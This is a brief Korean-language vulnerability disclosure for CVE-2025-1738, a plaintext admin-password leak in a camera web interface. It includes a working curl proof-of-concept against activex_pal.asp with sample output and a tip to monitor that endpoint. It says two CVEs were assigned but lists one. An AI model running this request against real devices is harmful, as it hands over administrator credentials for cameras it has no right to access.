
0day 발견 CVE-2025-1738
책임 있는 공개 절차에 따라 두 개의 공식 CVE가 할당되었습니다.
| CVE | CVSS v3.1 | 점수 | CWE | 유형 |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | 평문 비밀번호 노출 |
모든 로컬 사용자는 사전 인증 없이 관리자 비밀번호를 평문으로 가져올 수 있습니다.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
관리자 비밀번호는 응답 본문 내에서 평문으로 반환됩니다.
activex_pal.asp 및 mblogin.asp에 대한 예기치 않은 접근을 모니터링하십시오.이 저장소는 교육 및 공인된 보안 연구 목적으로만 제공됩니다. 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다. 항상 기기를 테스트하기 전에 명시적 허가를 받으십시오.